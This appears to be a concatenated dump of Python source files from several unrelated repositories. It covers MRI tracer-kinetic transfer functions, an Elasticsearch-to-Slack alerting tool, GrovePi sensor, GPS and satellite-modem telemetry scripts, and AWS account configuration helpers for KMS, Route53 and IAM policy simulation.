self.PS = mri.DCE.Models.Conversion.PS(F_p=self.F_p, K_trans=self.K_trans)
E = self.PS/float(self.PS + self.F_p)
e = self.v_e/float(self.v_e + self.v_p)
Ee = E*e
tau_pluss = (E - Ee + e)/(2.*E)*(1 + np.sqrt(1 - 4*(Ee*(1-E)*(1-e))/(E - Ee + e)**2 ) )
tau_minus = (E - Ee + e)/(2.*E)*(1 - np.sqrt(1 - 4*(Ee*(1-E)*(1-e))/(E - Ee + e)**2 ) )
F_pluss = self.F_p*(tau_pluss - 1.)/(tau_pluss - tau_minus)
F_minus = -self.F_p*(tau_minus - 1.)/(tau_pluss - tau_minus)
K_pluss = self.F_p/((self.v_p + self.v_e) * tau_minus)
K_minus = self.F_p/((self.v_p + self.v_e) * tau_pluss)
i = np.complex(0,1)
H = F_pluss/(i*self.w + K_pluss) + F_minus/(i*self.w + K_minus)
if cutoff:
c1 = 2*np.pi*np.abs(-K_pluss/i)
c2 = 2*np.pi*np.abs(-K_minus/i)
zero = 2*np.pi*np.abs(i*(K_pluss*F_minus + K_minus*F_pluss)/(F_pluss + F_minus))
return c1, c2, zero
return self.dB(H)
def H_ETM(self, cutoff=False):
i = np.complex(0,1)
H = self.v_p + self.K_trans/(i*self.w + self.k_ep)
if cutoff:
c = 2*np.pi*np.abs(-self.k_ep/i)
zero = 2*np.pi*np.abs(i*(self.K_trans + self.v_p*self.k_ep)/self.v_p)
return c, zero
return self.dB(H)
def H_TM(self, cutoff=False):
i = np.complex(0,1)
H = self.K_trans/(i*self.w + self.k_ep)
if cutoff:
c = 2*np.pi*np.abs(-self.k_ep/i)
return c
return self.dB(H)
```
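A usage sketch for the transfer-function class above, comparing the Tofts-model cutoff with the extended Tofts magnitude response. The kinetic parameter values are illustrative, the class is assumed to be importable from `imports.py`, and because the class relies on `np.complex` this also assumes a NumPy version that still provides it.
```python
import numpy as np
from imports import TransferFunctions  # assumed import of the module above
w = np.logspace(-3, 2, 500)            # angular frequencies to evaluate
tf = TransferFunctions(w, K_trans=0.07, v_e=0.2, v_p=0.02, F_p=0.4)
print(tf.H_TM(cutoff=True))            # Tofts-model cutoff, 2*pi*k_ep
gain_db = tf.H_ETM()                   # extended Tofts magnitude response in dB
print(gain_db[:5])
```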
#### File: test/T1_mapping/test_t1_MJT_EdinburghUK.py
```python
import pytest
import numpy as np
from ..helpers import osipi_parametrize
from . import t1_data
from src.original.MJT_UoEdinburghUK.t1_fit import fit_vfa_linear, fit_vfa_nonlinear
# All tests will use the same arguments and same data...
arg_names = 'label, fa_array, tr_array, s_array, r1_ref, s0_ref, a_tol, r_tol'
test_data = (
t1_data.t1_brain_data() +
t1_data.t1_quiba_data() +
t1_data.t1_prostate_data()
)
# Use the test data to generate a parametrize decorator. This causes the following
# test to be run for every test case listed in test_data...
@osipi_parametrize(arg_names, test_data, xf_labels = [])
def test_MJT_EdinburghUK_t1_VFA_nonlin(label, fa_array, tr_array, s_array, r1_ref, s0_ref, a_tol, r_tol):
# NOTES:
# prepare input data
tr = tr_array[0]
fa_array_rad = fa_array * np.pi/180.
# run test (non-linear)
[s0_nonlin_meas, t1_nonlin_meas] = fit_vfa_nonlinear(s_array,fa_array_rad,tr)
r1_nonlin_meas = 1./t1_nonlin_meas
np.testing.assert_allclose( [r1_nonlin_meas], [r1_ref], rtol=r_tol, atol=a_tol )
# In the following test, we specify 1 case that is expected to fail...
@osipi_parametrize(arg_names, test_data, xf_labels = ['Pat5_voxel5_prostaat'])
def test_MJT_EdinburghUK_t1_VFA_lin(label, fa_array, tr_array, s_array, r1_ref, s0_ref, a_tol, r_tol):
# NOTES:
# Expected fails: 1 low-SNR prostate voxel
# prepare input data
tr = tr_array[0]
fa_array_rad = fa_array * np.pi/180.
    # run test (linear)
[s0_lin_meas, t1_lin_meas] = fit_vfa_linear(s_array,fa_array_rad,tr)
r1_lin_meas = 1./t1_lin_meas
np.testing.assert_allclose( [r1_lin_meas], [r1_ref], rtol=r_tol, atol=a_tol )
``` |
{
"source": "jonathanbak/esalert",
"score": 3
} |
#### File: jonathanbak/esalert/config.py
```python
import os
import configparser
import libs.constant as constant
# Various configuration settings
class Config:
DEBUG = False
TESTING = False
CONFIG_FILE = os.path.join(constant.BASE_DIR, 'conf/config.ini')
def __init__(self) :
self.config = configparser.ConfigParser()
self.config.read(self.CONFIG_FILE)
def get(self, key:str) :
res = self.config
keyList = key.split('.')
for k in keyList:
if k in res:
res = res[k]
else:
res = None
break
return res
def configLoader() :
ConfigInstance = Config()
return ConfigInstance
```
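A minimal sketch of the dotted-key lookup provided by `Config.get` above; the section and option names match those used elsewhere in this repository, while the ini contents shown in the comment are placeholders.
```python
import config
c = config.configLoader()
# conf/config.ini is expected to contain sections such as:
# [elastic]
# url = http://localhost:9200
# ApiKey = changeme
print(c.get("elastic.url"))      # value of `url` in the [elastic] section
print(c.get("elastic.missing"))  # None when any path component is absent
```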
#### File: jonathanbak/esalert/main.py
```python
__author__ = "AnsibleMedia"
__version__ = "0.1.0"
from logzero import logger
from libs.slack import SlackMessage
from libs.elastic import ElasticSearch
from libs.rules import RuleLoader
from libs.alert import AlertMessage
from libs.snooze import Snooze
from libs.queue import Queue
import config
import sys
import moment
logger.info('start app')
"""
Clustering
"""
def main():
c = config.configLoader()
r = RuleLoader()
es = ElasticSearch(url=c.get("elastic.url"), headers={"Authorization": "ApiKey "+c.get("elastic.ApiKey")})
s = Snooze()
q = Queue()
    is_send_alarm_time = False  # notification sending hours (09 ~ 18)
current_hour = int(moment.now().add(hour=0).format("HH"))
if current_hour >= 7 and current_hour <= 23:
is_send_alarm_time = True
for rule_name in r.config().all():
findKeys = r.config().get(rule_name + ".notify_key").split(',')
resFormat = r.config().get(rule_name + ".notify_format")
searchPath = r.config().get(rule_name + ".search_path")
alertTitle = r.config().get(rule_name + ".notify_title")
snoozeMinute = r.config().get(rule_name + ".snooze_minute")
slackUrl = r.config().get(rule_name + ".slack_url")
if slackUrl is None :
slackUrl = c.get("slack.url")
        # Load the ES query to run
searchData = r.load(rule_name + '.json')
        # Send the ES query to the ES server
es.search(searchPath, searchData)
responseJson = es.getResponse()
        # Load the query results
r.loadJson(responseJson)
responseHits = responseJson['hits']['hits']
        # Filter the messages to send as alerts
newResParams = r.findValues(findKeys)
logger.info(newResParams)
notify = AlertMessage(resFormat)
if len(newResParams) < 1:
            # print('Removing recent alert data', rule_name)
s.removeLatestSendMsg(rule_name)
for o in range(len(newResParams)):
echoStr = notify.getMessage(*newResParams[o])
            # Send alarms according to the re-notification (snooze) conditions
s.setAlarmData(
{"section": rule_name, "msg": echoStr, "data": responseHits[o]})
if snoozeMinute and int(snoozeMinute) > 0:
s.setSnoozeMinute(snoozeMinute)
if s.isVaildData() and s.isSentMsg() == False:
                # Send immediately during notification hours, otherwise store in the queue
s.saveSendMsg()
if is_send_alarm_time:
SlackInstance = SlackMessage(url=slackUrl, title=alertTitle, msg=echoStr)
SlackInstance.send()
else:
if rule_name != 'disk_full':
q.add_queue({
"url": slackUrl,
"title": alertTitle,
"msg": echoStr
})
    # Send the notifications stored in the queue
if is_send_alarm_time:
queue_list = q.get_queue_list()
if len(queue_list) > 0:
for i in queue_list:
SlackInstance = SlackMessage(url=i['url'], title=i['title'], msg=i['msg'])
SlackInstance.send()
q.reset_queue()
if __name__ == "__main__":
main()
logger.info('loaded complete..')
```
#### File: esalert/tests/config.py
```python
import unittest
from logzero import logger
import sys
import os
TEST_DIR = os.path.abspath(os.path.dirname(__file__))
currentdir = os.path.abspath(os.path.dirname(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
# sys.path.insert(0, '..')
import config
class ConfigTest(unittest.TestCase):
def test_load(self):
c = config.configLoader()
logger.info( type( c.get("elastic.ApiKey") ) == str )
# self.assertTrue( type( c.get("elastic.ApiKey") ) == str )
self.assertTrue( c.get("elastic.ApiKey") == "asdfasfd" )
if __name__ == '__main__':
unittest.main()
```
#### File: tests/libs/rules.py
```python
import unittest
from logzero import logger
import sys
import json
import os
import re
currentdir = os.path.abspath(os.path.dirname(__file__))
parentdir = os.path.dirname( os.path.dirname(currentdir) )
sys.path.insert(0, parentdir)
# sys.path.insert(0, '..')
from libs.rules import RuleLoader
from libs.alert import AlertMessage
class RuleLoaderTest(unittest.TestCase):
# def test_load(self):
# logger.info(type(RuleLoader))
# r = RuleLoader()
# logger.info( type( r.load('disk_full.json') ) )
# self.assertTrue( type( r.load('disk_full.json') ) == dict )
def test_find_values(self):
r = RuleLoader()
r.load('response_test1.json')
for k in r.config().all():
findKeys = r.config().get(k + ".notify_key").split(',')
resFormat = r.config().get(k + ".notify_format")
newResParams = r.findValues(findKeys)
notify = AlertMessage(resFormat)
for o in range(len(newResParams)):
echoStr = notify.getMessage(*newResParams[o])
logger.info( echoStr )
self.assertTrue( type( echoStr ) == str )
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jonathanbarton/gomake-telemetry",
"score": 3
} |
#### File: gomake-telemetry/extract/formatAndCustomizeCSV.py
```python
import csv
import sys
import os
os.chdir('outputs');
def create_csv():
with open('logs.txt', 'r') as in_file:
stripped = (line.strip() for line in in_file)
lines = (line.split(",") for line in stripped if line)
with open(fileName, 'w') as out_file:
writer = csv.writer(out_file)
writer.writerows(lines)
print 'Results are available in ' + fileName
def get_output_filename():
global fileName
    fileName = input('Enter output csv name in single quotes, e.g. MAVERICK20160620 : ')
try:
if(fileName):
fileName = fileName+ '.csv'
print(fileName + ' will be used for charts')
except ValueError:
print 'Please provide a valid output file name.'
get_output_filename()
create_csv()
```
#### File: gomake-telemetry/telemetry/button.py
```python
import signal
from sensor import Sensor
import grovepi
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Button(Sensor):
name = 'Button'
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
def connect(self):
grovepi.pinMode(self.pin, "INPUT")
def read(self):
try:
buttonPressed = grovepi.digitalRead(self.pin)
return str(buttonPressed)
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return '0'
def handleReadError(self):
pass
if __name__ == '__main__':
    b = Button(3)
    buttonPressed = b.read()
    print str(buttonPressed)
```
#### File: gomake-telemetry/telemetry/gas.py
```python
from sensor import Sensor
import grovepi
import logging
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Gas(Sensor):
name = 'Gas'
calibrationSampleSize = 100
R0 = 1
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
#self.calibrate()
def connect(self):
if(not isinstance(self.pin, int)):
self.validPin = False
else:
self.validPin = True
grovepi.pinMode(self.pin, "INPUT")
def read(self):
if(not self.validPin):
self.logError('No valid pin provided')
return '0'
try:
analogValue = grovepi.analogRead(self.pin)
density = (analogValue * 1.0) / 1024.0
return "%.4f" % density or "0"
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return '0'
def calibrate(self):
analogValue = grovepi.analogRead(self.pin)
for x in range(1,self.calibrationSampleSize):
print analogValue
analogValue += grovepi.analogRead(self.pin)
analogValue /= self.calibrationSampleSize
sensorVoltage = (analogValue * 1.0) / 1024.0 * 5.0
RS = (5.0 - sensorVoltage) / sensorVoltage
self.R0 = RS / 9.8
if __name__ == '__main__':
g = Gas(2)
while True:
gas = g.read()
print str(gas)
```
#### File: gomake-telemetry/telemetry/gps.py
```python
import serial
import signal
import sys
import time
import logging
from sensor import Sensor
from sentence import Sentence
class GPS(Sensor):
name = 'GPS'
conn = None
lastTryTime = None
numberOfReadTries = 0
maxNumberOfReadTries = 3
secondsToWaitForReconnect = 120
secondsToWaitForRead = 2
def __init__(self, serialPath, serialBaud, logger=None):
Sensor.__init__(self, self.name, logger)
self.serialPath = serialPath
self.serialBaud = serialBaud
self.connect()
def connect(self):
self.lastTryTime = int(time.time())
try:
self.conn = serial.Serial(self.serialPath, self.serialBaud)
self.numberOfReadTries = 0
except (serial.serialutil.SerialException, OSError) as e:
self.logMessage('Failed to open serial port for GPS')
def tryReconnect(self):
currentTime = int(time.time())
if(currentTime - self.lastTryTime >= self.secondsToWaitForReconnect):
self.connect()
def read(self):
#self.conn.flushOutput()
if(not self.conn):
self.tryReconnect()
while self.conn:
hasReadTriesLeft = self.numberOfReadTries < self.maxNumberOfReadTries
if not hasReadTriesLeft:
break
line = self.readLine() # '$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47'
if line[:6] == '$GPGGA':
sentence = self.getSentence(line)
if(sentence and sentence.isValid()):
#self.logMessage('closing connection')
#self.conn.close()
return sentence
self.numberOfReadTries += 1
time.sleep(0.1)
return Sentence([])
def readLine(self):
self.logMessage('start of readline')
try:
signal.signal(signal.SIGALRM, self.handleReadError)
signal.alarm(self.secondsToWaitForRead)
self.logMessage('readLine(): BEFORE READLINE: {}'.format(self.conn.inWaiting()))
line = self.conn.readline()
self.conn.flushInput()
self.logMessage('readLine(): AFTER READLINE: {}'.format(self.conn.inWaiting()))
signal.alarm(0)
self.numberOfReadTries = 0
return line
except serial.serialutil.SerialException:
self.numberOfReadTries += 1
self.logMessage('Failed to read from serial port')
return None
def handleReadError(self, signum, frame):
pass
def getSentence(self, line):
return Sentence(line)
if __name__ == "__main__":
gps=GPS('/dev/ttyAMA0', 4800)
coords = gps.read()
print coords
print str(coords.latitude) + ', ' + str(coords.longitude)
```
#### File: gomake-telemetry/telemetry/internaltemp.py
```python
from sensor import Sensor
import grovepi
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Temperature(Sensor):
name = 'Temperature'
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
def connect(self):
if(not isinstance(self.pin, int)):
self.validPin = False
else:
self.validPin = True
grovepi.pinMode(self.pin, "INPUT")
def read(self):
if(not self.validPin):
self.logError('No valid pin provided')
return 0
try:
analogValue = grovepi.analogRead(self.pin)
temperature = (5.0 * analogValue * 100.0) / 1024
return temperature
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return 0
if __name__ == '__main__':
t = Temperature(0)
temp = t.read()
print str(temp)
```
#### File: gomake-telemetry/telemetry/satmodem.py
```python
import sys, time, logging
import rockBlock
from rockBlock import rockBlockProtocol
import gps, flightrecord
from grove_rgb_lcd import *
def print_out_waiting(conn, msg):
buffer_size = str(conn.outWaiting())
logging.info(msg + buffer_size)
class SatModem (rockBlockProtocol):
devPath="/dev/tty.usbserial-FT0DJGSK"
def __init__(self, satPath, logger=None):
logPath = '/opt/telemetry-data/event.log'
        logging.basicConfig(filename=logPath, format='%(asctime)s gomake:: %(message)s', level=logging.INFO)
        self.logger = logging.getLogger(__name__)
self.devPath = satPath
self.modem = None
self.connect()
def connect(self):
logging.info("Attempting to connect to satellite")
try:
print self.devPath
self.modem = rockBlock.rockBlock(self.devPath, self)
print_out_waiting(self.modem.s,'connect():AFTER DEFAULT CONNECT:')
dir(self.modem)
except Exception as e:
logging.info('Satellite failed to initialize: {}'.format(e))
setText('INIT FAILED')
def sendMessage(self, message):
if(self.modem):
print_out_waiting(self.modem.s,'sendMessage():BEFORE SENDMESSAGE:')
self.modem.sendMessage(message)
else:
self.connect()
print_out_waiting(self.modem.s,'sendMessage()->connect():AFTER CONNECT:')
def rockBlockTxStarted(self):
logging.info("Establishing satellite connection...")
setText('TX CONNECTING')
def rockBlockTxFailed(self):
print_out_waiting(self.modem.s,'rockBlockTxFailed():BEFORE FLUSH:')
logging.info("Satellite transmission failed...")
setText('TX FAILED')
self.modem.s.flushOutput()
print_out_waiting(self.modem.s,'rockBlockTxFailed():AFTER FLUSH:')
def rockBlockTxSuccess(self,messageNumber):
logging.info("Satellite transmission succeeded for message " + str(messageNumber))
print_out_waiting(self.modem.s, 'rockBlockTxSuccess():AFTER TX SUCCEED EVENT:')
setText('TX SUCCEEDED')
if __name__ == '__main__':
messageString = sys.argv[1]
s = SatModem('/dev/ttyUSB0')
#g = gps.GPS('/dev/ttyAMA0', 4800, s.logger)
#coordinates = g.read()
#print str(coordinates.latitude) + ', ' + str(coordinates.longitude)
#timestamp =time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
#record = flightrecord.FlightRecord(timestamp, coordinates, {"Sound": "368", "Gas": "0.4717", "Barometer": "1010.39", "Temperature": "30.20"})
#s.sendMessage(record.getSatModemFormat())
s.sendMessage(messageString)
print 'Sent message'
```
#### File: gomake-telemetry/telemetry/sound.py
```python
from sensor import Sensor
import grovepi
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Sound(Sensor):
name = 'Sound'
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
def connect(self):
if(not isinstance(self.pin, int)):
self.validPin = False
else:
self.validPin = True
grovepi.pinMode(self.pin, "INPUT")
def read(self):
if(not self.validPin):
self.logError('No valid pin provided')
return '0'
try:
analogValue = grovepi.analogRead(self.pin)
return str(analogValue)
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return '0'
if __name__ == '__main__':
s = Sound(0)
sound = s.read()
print str(sound)
``` |
{
"source": "jonathanbeber/sevenseconds",
"score": 3
} |
#### File: sevenseconds/config/cloudwatch.py
```python
def configure_log_group(session: object, region: str):
client = session.client('logs', region)
logs = client.describe_log_groups(logGroupNamePrefix='vpc-flowgroup')['logGroups']
for log in logs:
if log.get('logGroupName', '') == 'vpc-flowgroup':
return
client.create_log_group(logGroupName='vpc-flowgroup')
```
#### File: sevenseconds/config/elasticache.py
```python
from ..helper import ActionOnExit
from ..helper.aws import filter_subnets
def configure_elasticache(session, region, vpc):
client = session.client('elasticache', region)
subnet_ids = [sn.id for sn in filter_subnets(vpc, 'internal')]
try:
response = client.describe_cache_subnet_groups(
CacheSubnetGroupName='internal',
)['CacheSubnetGroups'][0]
if response['VpcId'] != vpc.id:
with ActionOnExit('Remove ElastiCache subnet group..'):
client.delete_cache_subnet_group(CacheSubnetGroupName='internal')
# go to except
raise
elif set(subnet_ids) != set([x['SubnetIdentifier'] for x in response['Subnets']]):
with ActionOnExit('Replacing ElastiCache subnet group..'):
client.modify_cache_subnet_group(
CacheSubnetGroupName='internal',
CacheSubnetGroupDescription='Default subnet group using all internal subnets',
SubnetIds=subnet_ids
)
except Exception:
with ActionOnExit('Creating ElastiCache subnet group..') as act:
try:
client.create_cache_subnet_group(
CacheSubnetGroupName='internal',
CacheSubnetGroupDescription='Default subnet group using all internal subnets',
SubnetIds=subnet_ids
)
except Exception as e:
act.error(e)
```
#### File: sevenseconds/config/__init__.py
```python
from collections import namedtuple
from typing import NamedTuple, Optional
import boto3
from ..helper.auth import OAuthServices
class AccountData(NamedTuple):
name: str # Short Name of this Account
alias: str # Full AWS Account Alias Name (prefix + name)
id: str # AWS Account ID
session: boto3.Session # Boto3 Session for the current Account
    admin_session: boto3.Session # Boto3 Session for the Admin Account (for DNS delegation)
ami_session: boto3.Session # Boto3 Session of the Taupage Owner Accounts (for EC2 AMI)
config: dict # Configuration of the current Account
dry_run: bool # dry-run boolean Flag
options: dict # Command Options dict
    auth: OAuthServices # OAuthServices Object (e.g. for Account List and AWS Credentials Service)
@property
def domain(self) -> Optional[str]:
if self.config['domain'] is None:
return None
return self.config['domain'].format(account_name=self.name)
SharedData = namedtuple(
'SharedData',
(
'base_images', # {region -> {channel -> ami_id}}
'trusted_addresses'
))
```
#### File: sevenseconds/config/kms.py
```python
from ..helper import ActionOnExit
from botocore.exceptions import ClientError
import json
# TODO:support reverting Drop:true operation by either cancelling deletion or recreating the keys
def configure_kms_keys(account: object, region):
keys_config = account.config.get('kms', {})
kms_client = account.session.client('kms', region)
for key_alias in keys_config:
key_config = keys_config[key_alias]
if key_config.get('drop', False):
schedule_key_deletion(kms_client, key_alias)
continue
key = json.loads(json.dumps(key_config).replace('{account_id}', account.id))
with ActionOnExit('Searching for key "{}"..'.format(key_alias)) as act:
exist_aliases = kms_client.list_aliases()
found = False
for alias in exist_aliases['Aliases']:
if alias['AliasName'] == key_alias:
found = True
act.ok('key already exists, updating policy')
put_key_response = kms_client.put_key_policy(
KeyId=alias['TargetKeyId'],
PolicyName='default',
Policy=json.dumps(key['key_policy']),
BypassPolicyLockoutSafetyCheck=False
)
if put_key_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error(
'failed to update key policy for {} response: {}'
.format(key_alias, put_key_response)
)
break
act.ok("updated key policy for {}".format(key_alias))
break
if not found:
create_response = kms_client.create_key(
Description=key['description'],
KeyUsage=key['key_usage'],
Origin='AWS_KMS',
BypassPolicyLockoutSafetyCheck=False,
Policy=json.dumps(key['key_policy']),
Tags=key['tags']
)
if create_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error('failed to create a key {} response: {}'.format(key_alias, create_response))
continue
key_id = create_response['KeyMetadata']['KeyId']
alias_response = kms_client.create_alias(
AliasName=key_alias,
TargetKeyId=key_id
)
if alias_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error(
'failed to create alias {} with key {} res:{}'
.format(key_alias, key_id, alias_response)
)
continue
def schedule_key_deletion(kms_client, key_alias):
with ActionOnExit('Checking deletion status for key "{}"..'.format(key_alias)) as act:
try:
describe_key_response = kms_client.describe_key(
KeyId=key_alias
)
except ClientError as ex:
if ex.response['Error']['Code'] == 'NotFoundException':
act.ok('key {} cannot be found, probably deleted'.format(key_alias))
return
else:
raise ex
if describe_key_response['KeyMetadata']['KeyState'] == 'PendingDeletion':
act.ok('key {} is already scheduled for deletion'.format(key_alias))
return
schedule_response = kms_client.schedule_key_deletion(
KeyId=describe_key_response['KeyMetadata']['KeyId'],
PendingWindowInDays=7,
)
if schedule_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error(
'failed to schedule key {} for deletion'
.format(key_alias)
)
return
act.ok('successfully scheduled key {} for deletion'.format(key_alias))
```
#### File: sevenseconds/config/policysimulator.py
```python
import json
import botocore.exceptions
from ..helper import ActionOnExit, error, warning
def check_policy_simulator(account: object):
# return
roles = account.config.get('roles', {})
checks = account.config.get('roles_simulator', {})
errorcount = 0
for rolename, rolechecks in sorted(checks.items()):
if 'policy' not in roles[rolename]:
warning('{} has no policy'.format(rolename))
continue
errormsg = run_simulation(account.session, roles, rolename, rolechecks)
if len(errormsg):
errorcount += len(errormsg)
print('\n'.join(errormsg))
if errorcount:
        # fatal_error('found {} error(s) in the policies. Abort!'.format(errorcount))
        error('found {} error(s) in the policies.'.format(errorcount))
def run_simulation(session, roles, rolename, rolechecks):
iamc = session.client('iam')
errormsg = []
with ActionOnExit('Checking role {rolename}..', **vars()) as act:
for checkname, checkoptions in sorted(rolechecks.items()):
try:
result = iamc.simulate_custom_policy(PolicyInputList=[json.dumps(roles[rolename]['policy'])],
**checkoptions['simulation_options'])
except botocore.exceptions.ClientError as e:
act.fatal_error(e)
results = result['EvaluationResults']
while result.get('IsTruncated', False):
result = iamc.simulate_custom_policy(Marker=result['Marker'],
PolicyInputList=[json.dumps(roles[rolename]['policy'])],
**checkoptions['simulation_options'])
results.extend(result['EvaluationResults'])
for result in results:
if result['EvalDecision'] != checkoptions['simulation_result']:
errormsg.append('[{}] {} is {} and NOT {}'.format(checkname,
result['EvalActionName'],
result['EvalDecision'],
checkoptions['simulation_result']))
if len(errormsg):
act.error('mismatch')
return errormsg
```
#### File: sevenseconds/config/route53.py
```python
from ..helper import ActionOnExit, error, info, warning
from ..config import AccountData
def configure_dns(account: AccountData):
conn = account.session.client('route53')
dns_domain = account.domain
if not dns_domain:
info('No domain configured for account, skipping DNS setup')
return
zone = list(filter(lambda x: x['Name'] == dns_domain + '.',
conn.list_hosted_zones_by_name(DNSName=dns_domain + '.')['HostedZones']))
if not zone:
with ActionOnExit('Creating hosted zone..'):
conn.create_hosted_zone(Name=dns_domain + '.',
CallerReference='sevenseconds-' + dns_domain,
HostedZoneConfig={'Comment': 'Public Hosted Zone'})
zone = conn.list_hosted_zones_by_name(DNSName=dns_domain + '.')['HostedZones'][0]
nameservers = conn.get_hosted_zone(Id=zone['Id'])['DelegationSet']['NameServers']
info('Hosted zone for {} has nameservers {}'.format(dns_domain, nameservers))
with ActionOnExit('Set up DNS Delegation..') as act:
try:
configure_dns_delegation(account.admin_session, dns_domain, nameservers)
except Exception:
raise
act.error('DNS Delegation not possible')
soa_ttl = account.config.get('domain_soa_ttl', '60')
with ActionOnExit('Set SOA-TTL to {}..'.format(soa_ttl)):
rr_list = conn.list_resource_record_sets(HostedZoneId=zone['Id'],
StartRecordType='SOA',
StartRecordName=zone['Name'])
rr = rr_list['ResourceRecordSets'][0]['ResourceRecords']
changebatch = {'Comment': 'updated SOA TTL',
'Changes': [{'Action': 'UPSERT',
'ResourceRecordSet': {'Name': zone['Name'],
'Type': 'SOA',
'TTL': int(soa_ttl),
'ResourceRecords': rr}}]}
conn.change_resource_record_sets(HostedZoneId=zone['Id'], ChangeBatch=changebatch)
def configure_dns_delegation(admin_session: object, domain: str, nameservers: list, action: str = 'UPSERT'):
route53 = admin_session.client('route53')
zone_id = find_zoneid(domain, route53)
if zone_id:
response = route53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
'Comment': 'DNS delegation for {}'.format(domain),
'Changes': [
{
'Action': action,
'ResourceRecordSet': {
'Name': domain,
'Type': 'NS',
'TTL': 7200,
'ResourceRecords': [{'Value': x} for x in nameservers]
}
}
]
}
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
info('Request for {} successful: {}'.format(domain, response['ResponseMetadata']['RequestId']))
else:
error('Request for {} failed: {}'.format(domain, response))
else:
error('Can\'t find any Zone for {}'.format(domain))
def get_dns_record(account, dnsname, record_type='A'):
route53 = account.session.client('route53')
zone_id = find_zoneid(dnsname, route53)
if not zone_id:
return
result = route53.list_resource_record_sets(HostedZoneId=zone_id,
StartRecordType=record_type,
StartRecordName=dnsname,
MaxItems='1')['ResourceRecordSets'][0]
if not result:
return
if result['Name'] == dnsname and result['Type'] == record_type:
return result
else:
return
def configure_dns_record(account: AccountData, hostname, value, type='A', action='UPSERT'):
if isinstance(value, list):
values = value
else:
values = [value]
route53 = account.session.client('route53')
dns_domain = account.domain
if dns_domain is None:
raise ValueError("No DNS domain configured for account")
domain = '.'.join([hostname, dns_domain])
with ActionOnExit('{} DNS record {}: {}'
.format('Adding' if action == 'UPSERT' else 'Deleting', domain, values)) as act:
zone_id = find_zoneid(domain, route53)
if zone_id:
response = route53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
'Comment': 'DNS Entry for {}'.format(hostname),
'Changes': [
{
'Action': action,
'ResourceRecordSet': {
'Name': domain,
'Type': type,
'TTL': 600,
'ResourceRecords': [{'Value': x} for x in values]
}
}
]
}
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
act.ok('Request for {} successful: {}'.format(domain, response['ResponseMetadata']['RequestId']))
else:
act.error('Request for {} failed: {}'.format(domain, response))
else:
act.error('Can\'t find any Zone for {}'.format(domain))
def delete_dns_record(account, hostname, value, type='A', action='UPSERT'):
configure_dns_record(account, hostname, value, type, 'DELETE')
def find_zoneid(domain: str, route53: object):
result = route53.list_hosted_zones()
hosted_zones = result['HostedZones']
while result['IsTruncated']:
result = route53.list_hosted_zones(Marker=result['NextMarker'])
hosted_zones.extend(result['HostedZones'])
while domain != '':
id = [x['Id'] for x in hosted_zones if x['Name'] == domain + '.']
if not id:
try:
domain = '.'.join(domain.split('.')[1:])
except Exception:
domain = ''
else:
return id[0]
return None
def cleanup_delegation(account: AccountData):
route53 = account.admin_session.client('route53')
account_list = account.auth.get_aws_accounts()
tld = account.config.get('domain').format(account_name='').strip('.')
zone_id = find_zoneid(tld, route53)
if not zone_id:
return
result = route53.list_resource_record_sets(
HostedZoneId=zone_id,
StartRecordName=tld,
StartRecordType='NS')
zone_entries = result['ResourceRecordSets']
while (result['IsTruncated'] and result['NextRecordType'] == 'NS'):
if 'NextRecordIdentifier' in result:
result = route53.list_resource_record_sets(
HostedZoneId=zone_id,
StartRecordName=result['NextRecordName'],
StartRecordType=result['NextRecordType'],
StartRecordIdentifier=result['NextRecordIdentifier']
)
else:
result = route53.list_resource_record_sets(
HostedZoneId=zone_id,
StartRecordName=result['NextRecordName'],
StartRecordType=result['NextRecordType']
)
zone_entries.extend(result['ResourceRecordSets'])
delegations = [x for x in zone_entries if x['Type'] == 'NS' and x['Name'] != tld + '.']
to_delete = []
for delegation in delegations:
subpart = delegation['Name'].split('.')[0]
matched = [x for x in account_list if x['name'] == subpart]
if len(matched) == 1:
# Enable/Disable
if matched[0]['disabled']:
to_delete.append(delegation)
elif len(matched) > 0:
            error('Found more than 1 Account: {}'.format(matched))
else:
warning('Can\'t find an Account for "{}" (Nameservers: {})'.format(
delegation['Name'],
', '.join([x['Value'] for x in delegation['ResourceRecords']])))
for old_delegation in to_delete:
configure_dns_delegation(
account.admin_session,
domain=old_delegation['Name'].strip('.'),
nameservers=[x['Value'] for x in old_delegation['ResourceRecords']],
action='DELETE')
```
#### File: sevenseconds/helper/auth.py
```python
import jwt
import zign.api
import requests
import os
import boto3
import botocore.exceptions
import multiprocessing
from itertools import repeat
from ..helper import ActionOnExit, error, fatal_error
class AssumeRoleFailed(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return 'Assuming role failed: {}'.format(self.msg)
class OAuthServices:
def __init__(self,
aws_credentials_service_url: str,
aws_credentials_service_resources: dict,
account_list_url: str,
token_managed_id_key: str,
login_account: str,
role_name: str,
token: str):
if token:
self.token = token
else:
self.token = zign.api.get_token('<PASSWORD>', ['uid'])
self.service_url = aws_credentials_service_url
self.service_resources = aws_credentials_service_resources
self.account_list_url = account_list_url
self.token_managed_id_key = token_managed_id_key
